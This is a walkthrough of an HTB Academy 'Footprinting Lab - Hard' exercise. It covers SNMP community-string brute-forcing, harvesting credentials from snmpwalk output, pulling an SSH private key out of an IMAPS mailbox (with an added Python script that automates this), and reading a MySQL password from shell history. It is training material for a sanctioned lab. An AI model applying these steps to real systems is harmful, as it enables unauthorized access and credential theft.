HTB Academy: "Footprinting Lab - Hard" Walkthrough
- Winifred
- Aug 18, 2024
- 2 min read
Enumeration
Let's run both a TCP and a UDP nmap scan against the target host (SNMP listens on UDP/161, so a TCP-only scan would miss it entirely):
Here we see that SNMP is open, as well as SSH, POP3, and IMAP.
SNMP
Let's use onesixtyone to brute-force community strings for the SNMP service:
onesixtyone returns "backup" as a valid community string. Let's now use it to walk the MIB tree (snmpwalk with that community) and look for useful strings in the output:
A couple of lines down we find some credentials:
We can now use these credentials to pivot into the mail services available on the system.
IMAPS
First we use openssl s_client to open a TLS connection to the IMAPS service (IMAP over TLS, normally port 993):
Then we log in using Tom's credentials, the ones we pulled out of the SNMP output:
From here, let's list the available mailboxes:
Let's take a look in the Inbox:
There's one message in the inbox. Let's fetch the message body and see what it contains:
There's an SSH private key in the body of the message. We can probably use it to access the system over SSH. Copy the key (from the BEGIN line through the END line) into a local file on your host and chmod 600 it: ssh refuses to use a private key that other users can read, so with looser permissions it prints a "permissions are too open" warning and ignores the key.
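The whole IMAPS sequence above (connect, LOGIN, SELECT INBOX, FETCH, copy the key out, chmod 600) can be scripted with Python's imaplib, which also avoids the two classic copy-paste mistakes: CRLF line endings from the mail client and a key file created world-readable before the chmod. The code below is an added example, not code from the walkthrough or from HTB; the host, user and password are assumptions passed in by the caller, and the sample message is constructed with placeholder key material so the parsing and file-permission parts run offline.

```python
# Added example (not from the walkthrough): fetch the inbox over IMAPS, extract the
# PEM private key from the message body and save it with mode 0600.
import email
import imaplib
import os
import re
import stat

# "-----BEGIN OPENSSH PRIVATE KEY-----" ... "-----END OPENSSH PRIVATE KEY-----",
# plus the RSA/EC/unlabelled PEM variants, matched across lines.
KEY_RE = re.compile(
    r"-----BEGIN (?:[A-Z ]+ )?PRIVATE KEY-----.*?-----END (?:[A-Z ]+ )?PRIVATE KEY-----",
    re.S,
)


def message_text(raw):
    # Join the text/plain parts of a raw RFC822 message (what FETCH ... (RFC822) returns)
    msg = email.message_from_bytes(raw)
    chunks = []
    for part in msg.walk():                     # a non-multipart message walks to itself
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            chunks.append(payload.decode(part.get_content_charset() or "utf-8", "replace"))
    return "\n".join(chunks)


def extract_private_key(body):
    # First PEM private-key block in the body, CRLF normalised to LF, one trailing newline;
    # ssh wants exactly the PEM block, nothing from the surrounding mail text
    m = KEY_RE.search(body)
    if not m:
        return None
    return m.group(0).replace("\r\n", "\n").strip() + "\n"


def save_key(key, path):
    # Create the file 0600 from the start, and fchmod in case it already existed:
    # ssh ignores a private key that is group- or world-readable
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as f:
        os.fchmod(fd, 0o600)
        f.write(key)
    return path


def file_mode(path):
    # Permission bits only, e.g. 0o600
    return stat.S_IMODE(os.stat(path).st_mode)


def inbox_bodies(host, user, password, port=993):
    # IMAPS login, SELECT INBOX read-only, then yield each message's text
    with imaplib.IMAP4_SSL(host, port) as conn:
        conn.login(user, password)
        conn.select("INBOX", readonly=True)
        _, ids = conn.search(None, "ALL")
        for num in ids[0].split():
            _, fetched = conn.fetch(num, "(RFC822)")
            yield message_text(fetched[0][1])


def pull_ssh_key(host, user, password, out_path):
    # Save the first private key found in the inbox to out_path; return the path or None
    for body in inbox_bodies(host, user, password):
        key = extract_private_key(body)
        if key:
            return save_key(key, out_path)
    return None


# Constructed sample message for offline use; the key material is a placeholder, not a real key.
SAMPLE_RAW = (
    b"From: admin@localhost\r\nTo: tom@localhost\r\nSubject: your key\r\n"
    b"Content-Type: text/plain; charset=us-ascii\r\n\r\n"
    b"Hi Tom, here is your key:\r\n\r\n"
    b"-----BEGIN OPENSSH PRIVATE KEY-----\r\n"
    b"b3BlbnNzaC1rZXktdjEAAAAA/constructed+placeholder+not+a+real+key\r\n"
    b"-----END OPENSSH PRIVATE KEY-----\r\n\r\nCheers\r\n"
)

if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:                      # assumption: host user password on the command line
        print(pull_ssh_key(sys.argv[1], sys.argv[2], sys.argv[3], "tom_id"))
    else:
        print(extract_private_key(message_text(SAMPLE_RAW)))
```

Run it as `python3 imap_key.py <lab-ip> <user> <password>` and point ssh at the resulting `tom_id` file with `-i`. Opening the file with mode 0600 in the os.open call matters because a plain `open()` followed by `chmod` leaves a window where the key is readable by everyone on a shared host.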
SSH
Let's use the SSH key to try to access the system:
From here, start enumerating as thoroughly as possible. The goal of the exercise is to find the password for the HTB user.
Running ls -la in tom's home folder shows a hidden .mysql_history file.
Catting it shows a set of MySQL queries:
Let's check whether MySQL is running on the system (it did not appear in the port scan, so if it is up it is probably only listening on localhost):
Connect to the MySQL instance as tom, with the password you found in the SNMP data:
Repeat the commands you found in the .mysql_history file:
The HTB user's password will be found in that output. Happy hacking!